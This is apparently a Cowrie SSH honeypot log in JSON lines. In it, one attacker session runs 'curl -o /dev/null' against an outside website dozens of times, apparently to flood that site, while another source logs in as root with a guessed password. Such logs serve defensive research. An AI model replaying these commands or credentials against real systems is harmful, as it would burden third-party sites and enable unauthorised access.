{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.761269Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.765553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.767814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.807097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.808199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.846834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.847761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.884942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.885880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.923642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.924464Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.975166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.975966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.013618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.014561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.052732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.053843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.092386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.093325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.130822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.132457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.198687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.200488Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.237911Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.276033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.277508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.301220Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.316492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.317306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.355179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.356450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.395064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.396210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.400552Z","src_ip":"23.227.147.163","session":"54aed05002ae"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.421373Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.448371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.449203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"23.227.147.163","src_port":44806,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7d63f988f77","protocol":"ssh","message":"New connection: 23.227.147.163:44806 (1.2.3.4:22) [session: a7d63f988f77]","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.483270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.484399Z","src_ip":"23.227.147.163","session":"a7d63f988f77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.488760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.489694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.529602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.530844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.569933Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.571265Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.574455Z","src_ip":"23.227.147.163","session":"a7d63f988f77"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.582295Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.617051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.617778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.656395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.657378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.723909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.725457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.763277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.764226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.778183Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.804363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.805236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.844550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.845384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.903872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.904560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.914487Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.951544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.952452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.958941Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.975891Z","src_ip":"23.227.147.163","session":"a7d63f988f77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:59.989519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:59.990440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.029306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.030230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.065454Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.068034Z","src_ip":"23.227.147.163","session":"a7d63f988f77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.072887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.073865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.117346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.118257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.120050Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.157675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.158703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.206371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.207348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.244896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.245806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.283920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.284889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.331795Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.332991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.360855Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.371454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.372301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.409244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.410103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.448671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.449539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.487102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.488001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.526286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.527200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.565339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.566181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.598605Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.602894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.604109Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.640904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.641973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.664676Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.679279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.680095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.730091Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.731016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.754103Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.769700Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.770584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.793612Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.807749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.808579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:00.847470Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:00.848342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
